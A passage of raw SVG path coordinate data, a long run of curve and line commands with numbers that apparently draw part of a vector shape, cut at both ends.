3-.4-3.2-.6-.1.3,2.5.8,2.4,1.1l-5.3-.9a31.71,31.71,0,0,1,8,2.7c1.6-.4,10.3.2,6.3-1.1,1.8.3,6.3.7,7.3,1.1-2.3.1-3.4-.1-.5.9-1.3-.2-1.5-.4-3.2-.6.4,1-7.2-.8-6.7.2a51.94,51.94,0,0,1,5.5,1.5c.5-.2,4.9.8,5.3,1-2.1-.1-2.7,0,1.2.4-2.3,0-.3,1.3-4.5.8-2.5-.4-3.2-.7-6.4-1.2-3.1-1.1-1.5-1.9-2.2-2.7a37.31,37.31,0,0,0-4.1-.5q3.45.6,3.3.9a52.82,52.82,0,0,1-5.3-.9c.3.3.5.6-1.8.3-.1-.2-.1-.3-.2-.5-5.2-.9-7.1-.4-5.7.2a12,12,0,0,1,3,.2c.3.2,1.8.5,2.3.7-.6.3-3.6-.5-5.1-.5,3,.7-2.3-.3-2-.1,1.6.4,3.4.7,3.4,1-1.6-.2-3.9-.7-4.1-.6,8.6,2.5-5.1.9,2.6,3.4a12.75,12.75,0,0,0-3.9-.1c3.9.6,5.7.7,9.3,1.2-.5-.6-1.4-1.8,3.3-1.2.3.3,2.6,1.1-.6.8,1.6.3,3.9.6,4.3.8-1.8.9,3.4,3.4-.1,3.9.2-.2,4.6.7,5.1.6-4.3-1.1-3.3-1.5.4-1.3-3.7-1.3-2.3-2.3-3.4-3.2,5.8.9,6.7.1,11.1,1,.5-.2-1.8-1.2.5-.9.4.4,3.5.9,4.5,1.3.8-.1,2.2-.1,1.6-.6,2.6.5,3.4.8,4.1.6-.7-1-2.6-2.4,3.8-2.3,6.1,1.2,2.8,1.4,4.9,2.1,1.9-.1,0,.5,2.3.8.1-.3,6.4.8,7.3,1.2-.8.1-2.4,0-6.1-.7.3.3.5.7,3.4,1.1-2.2-1,5.5.8,5.1.5a19,19,0,0,1-3.3-.9c6.1,1,.3-.5-1.5-1,3,.2-4.4-2.3,2.1-1.8,1.4.6,2.5,1,1.5,1.1,4.3.8,6.6,1.5,7.8,2.2-2-.1-2.1-.4-4.3-.8.6.4,6.7,1.9,1.5,1.3a9.61,9.61,0,0,0-3.4-1c3.3,1.2,9.9,2.8,10.3,3.5,1.8.3,3.2.5,4.1.6,2.1,1.4,8.2,3.5,2.3,2.9.9.5-.8.9,1.7,1.5.7-.3,5.8.6,4.9.1a66,66,0,0,0,6.7,2c-2.3-.3-1.5.2-1.8.5-.1.1-.3.1-.9.1a2.7,2.7,0,0,0-.8-.1c-1.2-.3.9-.4-1.5-.7-1.7,0-2.6.2-3,.6-1.1.9,1.1,2.6-3.2,2.7-3.2-.8,2.5-.5-2.7-1.6-2.3,0-.8.9-3.4,1-3.9-.6-4.7-1-4.5-1.3,6.2,1,2.3-1.1,10,.7-2.6-1-3.5-1.7.3-1.5-.1,0-.2-.1-.4-.1-1.1-.3-3.7-.7-3-.9a15.44,15.44,0,0,1,3.3.8c-4.8-1.4-1.7-2.9-7-4.6a37.91,37.91,0,0,0,4.1.5c-2.5-.5-3-.9-5.5-1.4,1.3.6-2,0-2.9.1,1.5.3,3.9,1.2,1.4.9s-1.3-.5-3.3-.9c-.2.1.1.2-.9.1a2.67,2.67,0,0,0-1.2-.4c-.1.5,6.8,2.3,1.8,1.7.9-.3-3.6-.8-4.4-1.2,2.2-.1-1.8-1.6-2.9-2,1.4.9-5.6-.4-6.9-.1-1.7-.7,2.8.2,1.8-.3a49.24,49.24,0,0,0-10.2-1.1c.6-.2-2.3-.6-3.3-.9-1.5,0,.3,1-5-.3-.2.3,1.6,1.1-1.7.6-2.3-.6-.1-.9-4.6-1.7,13.3,4.2-14.6.3-5,3.7-5-1-4.5-.5-6.1-.6-3.9-.8-6.9-1.6-9.8-2.4,1.9.1,0-.3-.3-.6,1.7,0,4.1.7,4,.3-1.8-.3-3.2-.5-4.1-.6-.8-.6.6-.6,1.4-1.2-3.6-.8-3.7-1.1-7.5-1.6,1.8,1.1-2.2.7,3,2.3-2.3-.7-10.8-1.5-5-.3.1-.2-.6-.5.8-.3,1.6.3,3.8.6,4.2.8-.8.3,3.6,1.4-1.7.5,1.3.1,1.2-.2-1.3-.7.1.4-1.9-.3-3-.2,2.9.8,3.6,1.8.7,1.6-1.1-.2-2.1-.3-3.1-.5,2-.2-7.3-2-2.4-.9-2.4.4,6.9,2.3,10.1,3,.6.4-3.9-.5-4-.3,4.8.8,5.1,1.5,7.8,2.2-.5-.3,3.7.2,4.1.6-1.8.4,1,2.2-2.9,2.1-1.9-.4-3.4-.9-4.2-.7,7.2,1.2-1.6.7,1.7,1.5,3.6.7,1.1-.3,5.1.5-.5.3,1.6.7,3.4,1.1a13.75,13.75,0,0,1,2.2.6c-3.6-.1-2.1,1.5.1,2.4,3.5.4-1.5-.9,2.8-.3,2.2.5,6.6,1.2,8.6,1.8-1.2,0,.8.9,2.6,1.4a6,6,0,0,1,4.1.6c1.6-.7-2.4-1.9-1.2-2.7a39.56,39.56,0,0,1-4.3-.9c1.8.2-.3-.6,1.8-.3,3.7.6,1.6.9,5.6,1.6.7-.2-4-2,1.5-1l-.3-.6c-7.3-1.2-4.1-2.1,1.6-.7.8-.4-1.4-1.6,4.6-.6-2,.3-1.3,1,2,2.1.3-.2,2.9.3,1.8-.3-2.8-.4-2.1-.6-3.3-.9,2.4.4.8-.4,2.9-.1,3.4.7,3.2.3,5.1.6,3.3,1.1-.7,1-1.3,1.3,4.1.7.6-.5,3.9,0,1.7.3.7.4,2.3.7,2.3.3-.9-.9,1.6-.6,1.5.5,1.1.9,4.6,1.5a32.09,32.09,0,0,1-4.7.2c3.7.4,4.6,1.3,10.8,2.5-4.2-1.2-9.4-2.9-1.9-2.1-1.6-.8-2.3-1.8,1.2-1.6a38,38,0,0,0,5.6,1.6c4.4.5-3.5-1.4-.6-1.3.2.2.4.3,2.2.6.1-.3-2.2-.7-3.4-1.1a31.24,31.24,0,0,1,7.2,1c-3.5.8.5,2.7-5.3,3.1-2.3-1.3,5.4-.9-2.2-2.6,3,1-2.9.2,1.6,1.3-1.6.2-6.2-.5-3.7.4-1.1-.6,2.7.3,3.1.5-1,.2-1.1.1-1.7.5,5.6,1,3,1.6,9,2.6-6.5-2.2.5-2.1,4.7-2.3-1.7-.6-4.2-.5-5.3-1a12,12,0,0,1,3,.2c5.3,1.2,3.9.6,9.3,1.2,2,1-4.8-.4-4.9,0,.7.4,5.4,1.6,3.6,1.5a21,21,0,0,1-2.2-.6c-.5.1-1.4,0-1.9.1a24.16,24.16,0,0,1,4.3.9c-5.2-.8-8.7-1.1-9-.6,1.8.3,2.6.3,3.2.5-2.2,0-1.9.7-4.6.6,3.5.8.1.5,2.6,1.3-4.8-.8.8,1.1-3.7.4.8.2,1.3.3,1.2.4,10.3,1.9,2.8-1,8.5-.4-.4.6,2.4.8,3.2.6,5.6,1.8-7.7.5-1.2,1.7-.2.2-5.5.1-2.7.4,1.5-.3.8,0,5.2.8,2.2.3-2.6-1.1.6-.8,1.5.3,1.1,1,2.3.8-.9-.6-.1-.5-2.5-1.2,1.1,0,3.9.5,5.1.5-.9-.3-5.1-.8-4.4-1.1,11.2,1.7,4.3-.9,9.4-.7,3.9,2.2,1,3.2,2.1,4.5a6.26,6.26,0,0,1,2.1.4c.1.1.1.2.2.4-2.4-.4-4-.7-5.2-.8,2.6.9-2.2.1-2.7.4,2.9,1.3,1.2,3.2-1.3,3.5-.3.5,2.1,2.8-4.8,2.2,1.6.3,3.9.6,4.3.8a23.15,23.15,0,0,0-4.1,1.5c1.4.3,4,.6,4.2.8-.9.1-3.8-.4-5-.4,6.8,1.7-3.7.7,1,2.2,5.1.7,1.4-.3-.2-.5a2.7,2.7,0,0,1,1.8-.3c.1.5,1.6.3,3.1.5,1.3.4,1.3.5.2.5,8.3,1.4.4-1.1.2-1.6s7.8,1,6.9.3a15,15,0,0,0-3-.3c-1.6-.8-3.9-1.8.3-1.4.9.5,4.4.8,4.1.5-2.6-.6-1.2-.6-3.6-1.4,5.1,1.1.6-.6,6.2.8-.3-.6-3.1-.7-4.5-1.3,4.2.4-.8-.1-1.3-.7a20.19,20.19,0,0,1,4.1.6c.5-.5-2.8-1.5-.7-1.6-1.5-.4-3.3-.7-4.4-1.1,1.1-.3,2.3-.5,1.3-1.3,8,1.4,6.8-.5,12.6,0-1.07-.15-2.14-.35-3.2-.6.2-.3,6.1.8,2.9-.1-3.6-.7-1.1.3-5.1-.5-1.3-.8-4.5-2.4-2.2-2.6-1.1.2,4,1.3,4.4,1.2-1.7-.6-4.4-1.2-4.6-1.7,1.4.3,3.9.8,5.4,1.1,1.1-.4-1.9-1.6-.8-1.8a9.18,9.18,0,0,1,2.2.6c1.3,1-3.2,1.5,2.3,2.8-1.9-1.1,3.1-1.3-.4-2.8,5.8,1-2.5-1.9,4.4-1.1-5.2-2-2-3.5,2.2-3.6a12.82,12.82,0,0,0,2.1.5,4.69,4.69,0,0,0-2.4-1.1c-.1.1-.2.2-2-.1-.4-.8,1-.8.3-1.4,1.6.3,2.7.6,4.3.9-1.7-1,3.2-.1,1.4-1.1-2.9-.4-2.8-.1-5.2-.9,3,.5,2.5.1,4,.2-1.7-.5-4.3-.5-5.3-1.1.4-.6-.8-.8-1.8-1.7,4.1.7,3.6-.1,7.2.9.3-.6,2.8-.4-1.7-1.5,3.3.7,4,.4,7.4,1.3.1-.2-1.3-.5-1.3-.7-2.3-.3-5.6-.7-6.4-1.2,1.3-.8,3.8-1.5,1.7-2.7a15.78,15.78,0,0,0-2.4-1c1.8.3,3.3.6,4.3.8l-.3-.6q-4.05-.6-3.3-.9c4.5,1,1.9.1,6.2.8,2.1.7.6.8-.9.9a4.82,4.82,0,0,0-1.5.3c5.8,1.2,4.4,2.3,1.6,2.1,5.9.5,5.3-1.2,3.4-1.9a22.29,22.29,0,0,1,2.7-.2c1.7-.1,3.3-.3,3.6-.8a9.76,9.76,0,0,1-3.3-.9c-3.2-.6-3-.3-6.2-.9-1.3.2,3,.7,2.4,1-5.1-1-2.4.1-7.2-.9.6-.4,4.9-.4-.7-1.6l-.3-.6c1.4.3,3.9.8,5.4,1.1.2-.6-5.5-.8-5.5-1.5,1.7.1,4.3.5.8-.3,3.4.2,5.8,1.2,7.4,1.2-1.7-.3-2.1-1.1-.4-.8a24.16,24.16,0,0,1,4.3.9c-5.4-1.1.8.8.5,1.1-1.5-.1-4.2-.6-5.1-.5,5.1.9.8.7.4.8,6.7,1,5.1.1,5.8,0,3.3.5.9.5,4.5,1.3-1.1-.6-4.2-1.6.5-1-2.7-.5.7-.7-4.5-1.3-1.3.1,3.1,1.1.3.7-4.9-1.3.3-.7,1.5-.9-3.5-.7-.6.3-4.1-.5,0-.1-.9-.3-1.2-.4-.6-.7,1.7-.4,4.7-.3-.8-.4-1.6-.1-3.1-.4,0-.2-.6-.3-1.2-.5a17.85,17.85,0,0,1,4,.3c2.7.4,1,.6,4.4,1.1-1-.6-1.4-.8.6-.8-1-.4-4.6-1-4.5-1.3s2.7.2,2.9,0c-1.6-.4-3.1-1.4-.7-1.4-2.1-.5-2.9-.9-4.5-1.3-.8.4,1.7,1.1-1.6.7a13,13,0,0,0-2.3-.7c0,.3,1.8.6,2.4,1-6.5-1.2-.5.6-2.8.3-1.4-.3-2.1-.5-4.2-.8,3,1.1,4.8,2.4-1.1,1.8,6.1.9,1.9,1.5-2.8.2.3.6,3.1.7,4.5,1.3-2-.3-2.5-.2-5.1-.6-5.9-2-1.8-1.9,2.9-2.1-3.3-1.3-1.1-1.2-2.8-1.9,1.1.2,2.1.3,3.1.5-2.9-.6-1.5-1.5-4.7-1.7,2.7.7,1.1,1.1-1.6.7-1.1-.9,1.2-.9.2-1.8a19.5,19.5,0,0,0,5.1.6c-6.1-1-4.5-1.5-1.3-.8-1.3-1.2,3.1-1.5-.6-3.3,4.1.5,4.1-.2,1.5-1,1.4.2,2.3.4,3.2.6-1.4-.7.9-.4,2.8-.2-3-.9-3.6-.2-5.2-.8a7.88,7.88,0,0,1,3.8-.1c0-.8-3.4-3,.5-3-3.6-1.3-4.9-5.3,1.6-2.7.7-.7-1.2-1.9-1.1-2.4.6.7.6-.1,4.2.7-1.1-.5-1.5-.6.8-.4-4.9-.9,1.4-.5-2.6-1.4,0,.1-.8,0-1.1-.2,2.8.4,2.6.3,6.2.8,2.8.7.8.5,2.5,1.2,3.6.4,3.5.7,6.4,1.3-2.3-1.8-.8-1.4.9-2.3-3.9-.7-1,.4-3.9-.1l-.3-.6c-2-.3-3.5-.5-4.1-.5,3.9.6-.5.3,3.4,1-.8,0-.6.3-4-.3-.3-.3.8-.4-2.3-.8.9.4,1.8.8-.7.5-3.9-1.3.7-1.9-3.6-3.5a4.17,4.17,0,0,0,2.6-.4c2.1.1,4.2.1,6.1.3a9,9,0,0,1,2-.2,3.87,3.87,0,0,0,1.9.3,4.17,4.17,0,0,1-1.1-.3h2.3c-.5.3,1.4.4,1.5.7,6.9.4,16.6.6,21.8,1.2.4-.4-5.3-.5-2.6-.7,2.8.1,2.5.4,5.5.4.6.2.7.5,3.5.5-1.6-.3,2.5-.4-.3-.4h1.3c.2.1.5.1.7.2-.2-.1-.3-.1-.4-.2,1.8-.1,3-.2,5.5-.2.4.4,2.2.6,4.1.7a19.51,19.51,0,0,0,5.5-.3c4.4.2,5.8.5,10.1,1-4.4.3-6.2-.1-10.6-.2-2,.8,13.9.9,10.8.4,2.7.2,2.1.4,1.5.7,3.4,0,1.7.4,4.5.4-.5-.3,0-.4,1.8-.4,1.2.2,1.3.4,2.5.6,7.5,0,9.1.2,18.1.4a16.36,16.36,0,0,1,3.8-.6,42.76,42.76,0,0,0,6.5.2c0,.2.5.3,1.3.5,4.5.2,4-.1,7.3-.1.1.3,1.1.7-.5.9,2,0,2.4.2,4.3.2,1.2-.3-3.5-.7-.5-.8s4,.5,2.5.6c6.2.3,12.7,1.9,18.4.9.4.2,1.7.2,1.4.5,4.7-.1,5.6.1,8.3-.2.4.2,1.9.2,2.3.4,1.1.3-1.3.3-.7.5,7.8.7,22.3.4,14.2-.8a38.38,38.38,0,0,1,6.6.5c-.9.4-2.6.7-2.4,1.2-5.2.3-11.2.6-17.1.6h0a109.94,109.94,0,0,1-14.5-.9c-3.6-.5-.9-.8-7.1-1.1.7.5,2,.7-.4,1,8.7,0,2.4,1.4,6.5,1.9-1.1.1-4.3,0-4,.4.8.2,2.5.4,3.6.6-3,.4.2,1.1-.8,2.1a14.87,14.87,0,0,1-2.2-.2c2.9,1.2-2.9,2.2,4.3,3.4-.4.4-3.2.6-2.4,1.2-3.3-.1-5,0-7.3.1,13.3,1.8,42.6,1.7,42.7-.4,8-.9,11.9-2.1,10.1-3.7,3.1-.1,3.7.2,6.3,0-1.4-.8,1.1-1.2,5.4-1.4-3.2-.1.9-.2-.3-.4-1.6.1-3.9.3-8.2.4,0-1.2-7-1.7-3.8-2.6,9.3.5,12.6,1.4,24.2,1.7,3.1,0,2.5-.5,7.1-.4,0-.2-.5-.3-1.3-.5a38.13,38.13,0,0,0,4-.2c2.9-.3,2.3-.9.3-1.6a.42.42,0,0,1-.2-.1h.34c3.4,0,4.8.1,4.8-.2,3.4-.1,1,.4,4.4.3a8.21,8.21,0,0,1,2.1-.1c-.1-.2-.5-.3-1.4-.5,8.5-.2,8.5-2.7,21.2-1.2,0,.3,1.3.8-.4,1,6.4.3.9.9,5.1,1.4-.3-.8,2.5-1-2.1-1.6,6.7.3,7.9-.3,10.7.3.7-.5,1.7-.7,3.6-.9,1.1.3,2.6-.1,5.3.1-.8.5,2.4.7,4.8,1-4.2.1-5,.6-5.5,1.2a13.54,13.54,0,0,1,3.3.2c-2.2.2-3.7.5-2.5,1,5.3,0,7.9.4,11.7.2,2.8.9,10.5.4,15.4.9-2-.5,2-1-3.1-1.4,3.1-.2,6.4-.3,8-.6-8.6-.2-4-1.4,1.2-1.4-1.4-.4-3.3-.7-4.9-1.1,1.1,0,1.2-.1,2-.1,4.3.2,5.4.6,5.8.9-.3-.2.9-.2,3-.2-.7-.3-3-.8.6-.8,1.6.3.1.8,2.6.7-2.5-.6,3.7.2,6.2-.2,2.7.3.4.7.6,1,2.8.2,3.3,0,4.3.2-.5,1.1,2.1,1.9,1.7,2.5.7-.4,5.2.1,5.5.4-4.3,0,1.5.6-1.6.7-2.7-.3-1.9-.4-1.6-.8-3.3-.2-3.6,0-6.5-.2-1.4.4,4.6.1,4.5.4s.7.4-.8.4c-1.7,0-1-.3-3.3-.3.3.5-1.8.5-6.1.3-.2.3-.8.2-2.8.5,2,.1,2.3-.1,4.2,0,1.2.2,1.3.4,2.5.6-1.8-.3-6.3.2-2.8.5l3-.3c.5.6-4.6.6-1.4,1.1.2-.1,2.2-.1,3-.2-2,.2.1.7,2.6.8-.5-.3-2.6-.5.7-.5,2.6.6,12.9.1,7.1-.3,1,.9-9.5-.2-2,.2.7-.3-3.6-.2-3.5-.5,11.5,0,5.9.8,13.4,1.3-2.1-.3-3.3-.7-.6-.9,9.6.1,15.1-.6,15.7-1.3h.3c.8.3,4.2.3,6.6.5-.6-.5,2.1-.4,7.1-.4-2.2-.4-2.7-.5-.5-.8-1.5-.2-5.2-.2-5.5-.4.5-.3,1.5-.8,5-.4-1.6-.5.8-1-5-1.3a15.32,15.32,0,0,1-1.9.3c-.1-.1-.1-.2-.2-.3-7.8.5-16.3-1.3-8.3-1.5-.1.1.4.8,1.3.5q-1.2-.45,3-.3c-1.6.1.8.5,3.6.6-1.4-.5,1.3-.5,2.7-.6-5-.6-3.1-1.6-7.9-2.5a27.31,27.31,0,0,0,3-.2c.2.2.1.4,2.4.4.6-.6-3.6-.8-4-1.3,3.2,0,4.4-.3-.1-.2-1-.5-.2-.8,4.9-.6a24.64,24.64,0,0,0,3.7.8c.6-.3,3.2-.3,3.8-.6,1.8,0,.8.3,2.3.4,2.5-.3-.1-.4-2.3-.6a9.16,9.16,0,0,0-2.6-.4c-.1-.1-.2-.3-.3-.4,1.6,0,3.9.1,4.2,0-4.1-.1-5.7-.2-7.6-.4-.5-.3,3-.1,3-.3-1.3,0-1.3-.2-1.3-.4-2.5-.1-6.9-.6-6.3,0,2.5.2,3.8-.2,4.2.1.7.4-2.5.3-4,.4-2.9-.3.4-1-.9-1.3,0,.2-2.6.1-2.2-.2,3.2,0,3.3.3,6.4.2.6-.5-2.2-.7-2.8-1,1.4,0,1.4-.1,3.1,0,1.8.4-4.4-1.2-6.3-1.7h.4c2.4.3,1.8.5,3.3.8,2.1-.1,1.1-.4.1-.7,1.6.1,3.6.2,4.9.4,1.1.3-2.8.5.5.8-.4-.4,1.1-.6,3-.7.4.1.8.1,1.1.2,1.3.3,5.2.2,7.4.6-.8.2-7.4.7-4.8.7a8.21,8.21,0,0,1,2.1-.1c.1.1.1.1.1.2-.4,0-.7.1-.6.1h.5a3.36,3.36,0,0,1-.6.3c-.7-.1-1.5-.1-2.6-.2,1.7.7-4,.9.2,1.7h2.3a4,4,0,0,1,.5.1c0,.1.1.1.1.2-1.3.1-1.1-.1-3.7-.1-.7.3,1.8.3,3.9.3.9.7,2.7,1.3-1.4,1.6,4.5.4,2,1.2,7,1.6,0-.3.4-.6.4-.9.8-.1,1.5-.1,2.3-.2h-2.4c-.1-.2-.4-.3-1-.5a16.21,16.21,0,0,0,2.2-.2,8.1,8.1,0,0,0,2.2,0,2.08,2.08,0,0,1,.7.1c0-.2,2.5-.2,5.2-.1,1.2-.5.7-1.1,3-1.8-3.8-.1-1.8.5-6.1.3-.2-.1-.2-.1-.1-.1h.4a5.6,5.6,0,0,0,.7-.2,3.88,3.88,0,0,0,.9-.1h-.7a3.25,3.25,0,0,0-1.3-.3,23.14,23.14,0,0,1,3,.2c.3-.3,3-.8.3-1.1.1.3-1.7.3-2.8.5-7-1.2,7.3-1.1,12-1a11.71,11.71,0,0,1,3.8-.6c4.6.1,1.8.9,6.9.9,1.2-.2-4.4-.4-1.3-.5a12.28,12.28,0,0,0,2.9.2,4.76,4.76,0,0,0,.7.3h-.1c-.1.2.5.3,1.5.3.6.1,1.4.3,2.1.4-.4-.1-.5-.2-.4-.3,2.7.1,6.1.1,6.8.4-.6.1-1.9.5,1.4.6,2.9.1-1.4-.6,2.9-.4,1.8,0,.8.3,2.4.4.7-.3,2.8.2,5.3.1.2-.3-.8-.7,3.8-.7-5.8-.1-3.6-.4-7.5-.2a15.33,15.33,0,0,1,5.1-.2c-1.2-1.1,1.3-1.8-.8-2.7,3.2-.1,4.3-.4,8.1-.4,2.5,0,1.6.3,2.8.5-.4.1-.6.1-.9.2a3.7,3.7,0,0,1,1.1-.1h.5a12.27,12.27,0,0,1,2.1,0,2,2,0,0,1,.9-.2c1.5,0,3.3,0,5.4.2-3.6-.3-2.1-.4-1-.6-1.2.5,4.7.4,5.3,1a16.09,16.09,0,0,0-2.5.1,12.35,12.35,0,0,0-1.7-.3c1.2.5-5.7.7-1.9,1a24.26,24.26,0,0,0,3.3-.2,9.78,9.78,0,0,0,1.3.3c3.1-.3,0-.9,4.7-.9-.3.3-.1.8,3.8,1-.3-.6,3.4-.7,5.6-1,.9.2-5.2,1.5-.9,1.8,1.9-.7,6-.9,12-1,1.3-.3-3.3-.6-.4-.7-.4.5,5.4-.2,1.8-.4.3.3-5.3.1-5.4-.2a45.71,45.71,0,0,0,7.4,0c-.3-.8-1.3-1.4-4.4-1.9.7.3-1.5.4-.1.6.1,0,.1.1.2.1-4.1.2-7.2,0-9.8.4-1-.5-.1-.5-2.6-.8,2.3,0,3.6.4,3.1,0-5-.4-2.8-1,.2-1.3a31.61,31.61,0,0,1-5.2-1.7h1.3a3.54,3.54,0,0,1-1.2-.7,21.48,21.48,0,0,1,3.4-.2c-.1-.2-.7-.3-1.3-.4-1.2-.4-.4.1-2.2.1a.68.68,0,0,1,.5-.4c1.5-.1,2.7-.2,1.3-.3a.87.87,0,0,1-.5-.1,53,53,0,0,1,5.4-1.3c-6.7-.2-4.6.5-9.1.5-.2-.1-.5-.2-.7-.3,1.9-.1,1.8-.3,1.1-.7,4.8.1,5.9-.1,8.2-.1-9.7-.7-4.3-1.6-1.9-2.1a21.47,21.47,0,0,1,3,.3c1.3-.6.9-.9-2.2-1.2.2,0,.3-.1.5-.1,1,.1,2.4.1,3.8.1-1.3.1-2.6.5.9.6-.5-.3,4.1,0,2.9-.4-.3-.1-1.2-.1-2.1-.2a9.89,9.89,0,0,1,2.3.2c.1.6,3.1,1-.2,1.3-2.3-.1-1.1-.3-3.1-.4l.4.4c1.7.1,2.7.1,3.5.1-.4.2-2,.3-4.9.1.3.3,4.8.9,5.5.4-5.2-.3,1.6-.1,2-.2-1.8,0-1.1-.2-1.2-.3a20.13,20.13,0,0,1,2.2.1c-1.5-.4-1.8-.8-1.6-1.1a23.62,23.62,0,0,1,4.2.4c-.2.1-.3.3-.4.4a15,15,0,0,0-2.5.2h2.7c.1,0,.2.1.3.1-.2,0-.2-.1-.3-.1,2.5,0,2.8.2.5.2,5,.1.8.5,4.5.5,2-.5-3.3-.7-.7-1.1,4.8.7,2.1,1.4,10.7,1.9.3.4.2.6-.2.8h-.2a10.52,10.52,0,0,0-2.9,1.5c3.6.1,5.4,0,5.3-.3-3.3-.1-1.8-.4-1.1-.7.8.2.7.6,1.4.7,4.3.2,3-.3,7.3-.1-.6-.2-2.7-.6.4-.6.1.1.3.1.7.2,1.2.5-.8.9,1.6,1.4,1.4-.2,4.1.5,5.7.7a12.27,12.27,0,0,1,2.1,0c.3-.2,2.1-.3,2.8-.5,1.7.5,2.4-.1,5.2,0,1.8.1.1.5,3.5.5.9-.2,3.1-.8-.6-.9-.1.6-7.2-.1-9.7-.4,5.2-.2-.3-1.2,7.6-1.3-1.5-.1-3.3-.2-4.5-.4,1.5-.5,2.8-.8,8.2-.4-.4-.3,1.4-.3,2.9-.4,1.2.2,1.7.9-1.5.8.3.3,2.2.4.4.6,2,.2,4.4.4,6.7.6-1.8.5,2,.6.7,1,1.9,0,3.8.1,5.7.1.4.2-1.8.2-2.6.3,2.1.3,4.1-.1,5.8.2.6.5-.5.3-2.7,0-.7.4,7,.4,6.2.8-9-.3,1.2.6-5.1.5a11.33,11.33,0,0,1,2.6.3v.1c-.1,0-.2.1-.4.1h-1.7c1.8.5-2.8.2-1.8.5a26.2,26.2,0,0,0,2.8.1c1.9.1,2.1,0,2-.1.5,0,1-.1,1.3-.1a6.42,6.42,0,0,1-1.8-.2.3.3,0,0,0,.2-.1c.4,0,.9.1,1.5.1h.1c.7.1,2.3.1,2.7.2,3.5,0,7.9,0,9.5-.2-9.3-.2,1.1-.3-3.4-.7a13.45,13.45,0,0,0,4.2,0c-3.2,0-1.9-.4-4.5-.4-.4.2-.1.5-3.9.3-1.3-.5-1.1-.9,0-1.2a50.79,50.79,0,0,1,7.8.2c-.5-.3.1-.5,2.9-.4.1-.2-1.4-.3-1.4-.5h4.2c.9.4,5.3.5,10,.9a7.88,7.88,0,0,1,2-.1c-3.2-.5,3.2-.4-1.6-.8a73.05,73.05,0,0,1,8.5.2c-1.3.1-1.1.4,1.4.5-.6-.4-1-.8-5-1.2a8.17,8.17,0,0,0,1.3-.2c1.6.1,3.4.1,4.9.2-.2.3,3,.2,2.5.6-.6,0-1.1.1.1.1,0-.1.1-.1,1-.1.3.1.2.2,1.2.2-1-.4,1.6-.3.6-.6-2,0-3.4-.1-4.6-.2,2.2,0,3.8,0,3.4-.2h-4.2c1.5-.2,1.2-.4-.6-.7,4.3.2,2.4-.6,6.2-.2.8-.4-4.8-.2-4.5-.5a7.35,7.35,0,0,0,2.4-.5h.5a8.34,8.34,0,0,1,1.8-.2c1.6,0,3.5,0,3.5-.2a21.47,21.47,0,0,1-3-.3c.4.2.3.3-.4.3a13.35,13.35,0,0,1-2,0h0c.1-.2,0-.5-.4-.7.8,0,1.7.1,2.5.1,5.8.2,10.1.4,8,1-7.2.1-3.4.6-1.7,1.3-1.9,0-3.1-.1-4.3-.2-.3.2-3.5,1.1,2.5,1.3,3.1.1-2.1-.3-.5-.6,4.6.2,1.6-.3,5.4-.2,2.3,1-.5,1.1-7.4,1,.5.7-1,1.1-2.1,1.8-.5.3-.9.6-1,1.1h.9c2.7.1,4.2-.2,4.8.1-2.2.3,1.1.5.9,1a12.82,12.82,0,0,0-4.1,0c5.1.5-4.5.4,3.4.7a34.87,34.87,0,0,1-5,.3h-1.7c.5,0,1.1.1,1.7.1,1.9.1,4.1.2,5.5.3.7.3.2.4-.9.5,2,.2,5.3.2,7.3.4-1.5-.5,2.6-.4,5.2-.4.6-.3-1.6-.4-2-.5.1,0,.2-.1.3-.1,1.8,0,3.6.1,5.4.1,1,.4-3,.4,1.9.6,5.1-.3-10.1-1-4.2-1.6-.6.6,3.8.2,6,.5-1.3-.7,12.9-1.8,13.5-.5,4.8.2,5-.1,5.3-.3-3.6,0-5.1-.2-4.6-.4-2.5-.1-8.2-.1-8.6-.3.9-.3,2.1-.6-2.2-.9,6-1.7.7-3.9,1.8-5.9,1.4.5,1.4.5.8.9,8.2.2,3.8.7,4.9.8,1.1-.3,1.7.4,4.3.1,1.6.9-.8,1.5,6.1,2.2-.5-.9,9.1.5,8.3,0-8.8-.6-7.4-1.3-3-1.8-1.7-.1-4-.1-4.4-.2,4.9-.2,5.3.5,7.7.8a45.25,45.25,0,0,0,4.6-1.1c2.2.1,4.6.3,4.6.5-1.1.4-2.8.2-.7.7-1.9,0-3.1-.1-4.3-.2-.1.3,3.5.4,3.4.7-2.4-.1-4.7-.1-7.1-.2a60.26,60.26,0,0,1,11.1,1.6c2-.7,13.6-1.2,8.1-1.9,2.4,0,8.4-.1,9.8.1-3,.4-4.4.3-.5,1-1.8,0-2.1-.2-4.4-.2.7.9-9.7.2-8.8,1.1,2.5.2,6.1.4,7.6.7.7-.3,6.6.1,7.2.3-2.7.1-3.5.3,1.6.3-3.1.4-.1,1.3-5.7,1.4-3.3-.1-4.3-.3-8.6-.3-4.3-.7-2.4-1.6-3.5-2.4-2.6,0-4.7,0-5.5.1,3.1,0,4.6.2,4.5.4-3.2,0-3.7,0-7.1-.2.5.3.8.5-2.3.5l-.4-.4c-7.1-.2-9.4.6-7.5.9a31.43,31.43,0,0,1,4-.2c.5.2,2.5.2,3.1.4-.8.4-4.8,0-6.8.2,4,.3-3.2,0-2.6.2,2.1.1,4.6.3,4.6.5-2.1,0-5.3-.2-5.6,0,11.8,1.3-6.6,1.6,4.1,3a30.21,30.21,0,0,0-5.2.4c5.3.1,7.7-.1,12.5,0-.7-.5-2.3-1.5,4.1-1.7.5.2,3.7.8-.6.9,2.1.1,5.2.1,5.8.2-2.2,1.1,5.1,2.9.6,3.8.2-.2,6.2.1,6.9-.1-5.9-.5-4.6-1.1.2-1.3-5.2-.8-3.5-2-5.2-2.7,7.9.1,8.8-.8,14.8-.5.6-.3-2.6-.9.5-1,.6.3,4.8.4,6.2.7,1-.2,2.9-.4,2-.8,3.6.1,4.6.3,5.6,0-1.1-.9-3.9-2,4.6-2.7,8.2.3,4,1,6.8,1.5,2.4-.4.1.5,3.2.5,0-.3,8.6-.1,9.9.2-1,.2-3.1.3-8.2.1.4.3.8.6,4.7.7-3.1-.7,7.4.1,6.8-.2-2.1-.1-3.6-.3-4.5-.4,8.3.2.3-.6-2.1-.8,4-.2-6.2-1.7,2.4-2,2,.4,3.5.7,2.2.9,5.9.2,9,.6,10.7,1.1-2.7.2-2.8-.1-5.8-.2.9.3,9.2.9,2.3,1a17.36,17.36,0,0,0-4.6-.5c4.6.7,13.6,1.5,14.3,2.1a52.3,52.3,0,0,0,5.6,0c3.1,1.1,11.6,2.3,3.7,2.6,1.2.4-.9,1,2.5,1.3.9-.4,7.8-.2,6.5-.5,2.2.4,5.5.8,9.3,1.1-4.1,0-.6.8-3.4.9-3.8,0,.5-.5-3.